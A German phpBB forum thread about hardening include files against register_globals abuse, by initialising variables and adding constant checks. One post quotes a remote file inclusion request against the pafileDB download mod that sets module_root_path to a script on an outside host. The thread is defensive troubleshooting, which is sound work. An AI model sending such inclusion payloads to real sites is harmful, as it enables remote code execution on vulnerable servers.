Forum gehackt über KB?

[cback]

An sich kann man auch register_globals entgegenwirken wenn man jede Variable vorher mit nix definiert.
also z.B

Code: Alles auswählen

$module_root_path = '';

Dann wird das was per register_globals übergeben einfach überschrieben.
Das ist auch eine effektive Möglichkeit bei sensiblen Variabeln sich davor zu schützen.

... wär nur schlecht, wenn in den Includes Dateien damit dann der Root Path weg ist der von den Hauptdateien definiert wird. Das ist ja das "Problem" an der Sache: Dinge wie z.B. $phpbb_root_path können in den includes Dateien nicht neu gesetzt werden, da diese von verschiedenen Plätzen aufgerufen werden (können).

z.B. eine Funktionsbibliothek hat im "Hauptbereich" des Forums den Root Path ./ und im ACP ../ würde man die var in der includes Datei also neu setzen, gäbe es einen Fehler in einem der Bereiche.


Wenn man also hier was im Code ändert, dann Konstantenprüfung, damit kann man die Datei nicht mehr einzeln aufrufen und ist damit eigentlich komplett abgesichert, auch vor anderen Variablen die nicht sauber belegt sind.

[DJBase]

Also wenn ich mal den Thread etwas entführen darf. Ich habe diverse Ordner mit einer .htaccess vor direktem Zugriff gesichert sowie die REGISTER GLOBALS auf off gestellt. Zusätzlich noch den CBackTracker eingebaut. Anscheinend kann man aber über den pafileDB Mod für pbpBB dennoch geschütze Verzeichnisse erreichen.

dload.php/pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?

Dank CBackTracker ist nichts passiert, aber dennoch stimmt mich das nachdenklich.

[de$ert]

Das mit dem Download mod würd mich auch interessieren.

@cback

Habe gelesen das du die KB Dateien im aktuellen Orion überarbeitet hast. Kann ich diese einfach über die Kb Dateien Kopieren die ich aktuell benutze?